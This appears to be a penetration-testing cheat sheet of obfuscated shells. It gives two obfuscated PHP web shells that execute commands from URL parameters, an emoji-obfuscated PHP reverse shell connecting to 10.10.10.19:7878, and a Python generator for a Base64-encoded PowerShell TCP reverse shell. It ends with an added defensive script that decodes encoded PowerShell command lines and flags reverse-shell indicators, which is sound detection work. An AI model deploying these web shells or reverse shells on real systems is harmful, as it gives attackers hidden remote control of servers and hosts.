Obfuscated Shells

Web Shells

Obfuscated PHP

#Usage: http://target.com/path/to/shell.php?0=command
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
#Usage: http://target.com/path/to/shell.php?_=function&__=argument
#Example: http://target.com/path/to/shell.php?_=system&__=ls
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

Reverse Shells

Emoji PHP

php -r '$๐Ÿ˜€="1";$๐Ÿ˜="2";$๐Ÿ˜…="3";$๐Ÿ˜†="4";$๐Ÿ˜‰="5";$๐Ÿ˜Š="6";$๐Ÿ˜Ž="7";$๐Ÿ˜="8";$๐Ÿ˜š="9";$๐Ÿ™‚="0";$๐Ÿคข=" ";$๐Ÿค“="<";$๐Ÿค =">";$๐Ÿ˜ฑ="-";$๐Ÿ˜ต="&";$๐Ÿคฉ="i";$๐Ÿค”=".";$๐Ÿคจ="/";$๐Ÿฅฐ="a";$๐Ÿ˜="b";$๐Ÿ˜ถ="i";$๐Ÿ™„="h";$๐Ÿ˜‚="c";$๐Ÿคฃ="d";$๐Ÿ˜ƒ="e";$๐Ÿ˜„="f";$๐Ÿ˜‹="k";$๐Ÿ˜˜="n";$๐Ÿ˜—="o";$๐Ÿ˜™="p";$๐Ÿค—="s";$๐Ÿ˜‘="x";$๐Ÿ’€ = $๐Ÿ˜„. $๐Ÿค—. $๐Ÿ˜—. $๐Ÿ˜‚. $๐Ÿ˜‹. $๐Ÿ˜—. $๐Ÿ˜™. $๐Ÿ˜ƒ. $๐Ÿ˜˜;$๐Ÿš€ = "10.10.10.19";$๐Ÿ’ป = 7878;$๐Ÿš = "sh". $๐Ÿคข. $๐Ÿ˜ฑ. $๐Ÿคฉ. $๐Ÿคข. $๐Ÿค“. $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿ˜. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…;$๐Ÿคฃ =  $๐Ÿ’€($๐Ÿš€,$๐Ÿ’ป);$๐Ÿ‘ฝ = $๐Ÿ˜ƒ. $๐Ÿ˜‘. $๐Ÿ˜ƒ. $๐Ÿ˜‚;$๐Ÿ‘ฝ($๐Ÿš);'

PowerShell Base64-encoded

#Run on your Linux host to generate the PowerShell reverse shell
python -c $'import base64; IP = "10.10.10.19"; PORT = "7878"; payload = \'$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\' % (IP, int(PORT)); print("powershell -e " + base64.b64encode(payload.encode("utf16")[2:]).decode());'
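
Added example (not part of the original page): a defender-side triage helper that recovers the script from a `powershell -e` command line of the kind the generator above prints (Base64 over UTF-16LE with the BOM stripped) and reports which tokens of that payload it contains. The function names, indicator labels and sample command lines are constructed for illustration.

```python
import base64
import binascii
import re

# Candidate "<flag> <base64>" pairs on a PowerShell command line.
FLAG_ARG = re.compile(r"[-/]([A-Za-z]+)\s+([A-Za-z0-9+/]{8,}={0,2})")
# Tokens present in the socket-based payload shown on this page.
INDICATORS = {
    "tcp_client": re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "dynamic_eval": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "raw_stream_io": re.compile(r"\.GetStream\(\)", re.I),
}

def is_encoded_flag(flag):
    """powershell.exe accepts -ec and any prefix of -EncodedCommand."""
    flag = flag.lower()
    return flag == "ec" or "encodedcommand".startswith(flag)

def decode_encoded_command(cmdline):
    """Return the decoded script text, or None if no encoded command is found."""
    for flag, blob in FLAG_ARG.findall(cmdline):
        if not is_encoded_flag(flag):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64 / UTF-16LE, keep scanning
    return None

def triage(cmdline):
    """Decode the command line and list the indicators the script matches."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None, []
    return script, [n for n, rx in INDICATORS.items() if rx.search(script)]

def encode_sample(script):
    # Builds constructed test input only: Base64 of UTF-16LE, no BOM.
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample command lines (not captured from a real host).
FRAGMENT = '$c = New-Object System.Net.Sockets.TCPClient("192.0.2.10",4444);$s = $c.GetStream();iex $d'
SAMPLES = [
    "powershell -e " + encode_sample(FRAGMENT),
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + encode_sample("Get-Date"),
    "powershell -ExecutionPolicy Bypass -File report.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line))
```

Feed it the process command line from process-creation logs (for example Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled); a decoded script that matches all three indicators is worth escalating.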
